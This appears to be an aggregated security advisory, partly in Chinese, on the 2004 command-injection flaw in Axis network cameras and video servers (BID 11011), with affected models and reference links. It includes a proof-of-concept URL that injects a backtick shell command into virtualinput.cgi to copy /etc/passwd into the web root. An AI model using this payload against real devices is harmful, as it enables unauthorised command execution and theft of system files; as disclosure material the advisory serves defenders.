https://www.exploit-db.com/exploits/24400
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1131

AxisNetworkCamera2.40及其早期版本和VideoServer3.12及其早期版本存在漏洞。远程攻击者借助virtualinput.cgi的查询字符串的重音(`)和可能其他shell元字符执行任意命令。

source: http://www.securityfocus.com/bid/11011/info

1. A shell metacharacter command-execution vulnerability allows an anonymous user to download the contents of the '/etc/passwd' file on the device. Other commands are also likely to work, facilitating other attacks.

This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.34 thru 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers


http://www.example.com/axis-cgi/io/virtualinput.cgi?x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwdx60

来源:BID
名称:11011
链接:http://www.securityfocus.com/bid/11011
来源:SECTRACK
名称:1011056
链接:http://securitytracker.com/id?1011056
来源:SECUNIA
名称:12353
链接:http://secunia.com/advisories/12353
来源:FULLDISC
名称:20040831AxisNetworkCameraandVideoServerSecurityAdvisory
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1282.html
来源:XF
名称:asix-command-execution(17076)
链接:http://xforce.iss.net/xforce/xfdb/17076
来源:OSVDB
名称:9121
链接:http://www.osvdb.org/9121
来源:FULLDISC
名称:20040822[PoC]Nastybug(s)foundinAxisNetworkCamera/VideoServers
链接:http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0948.html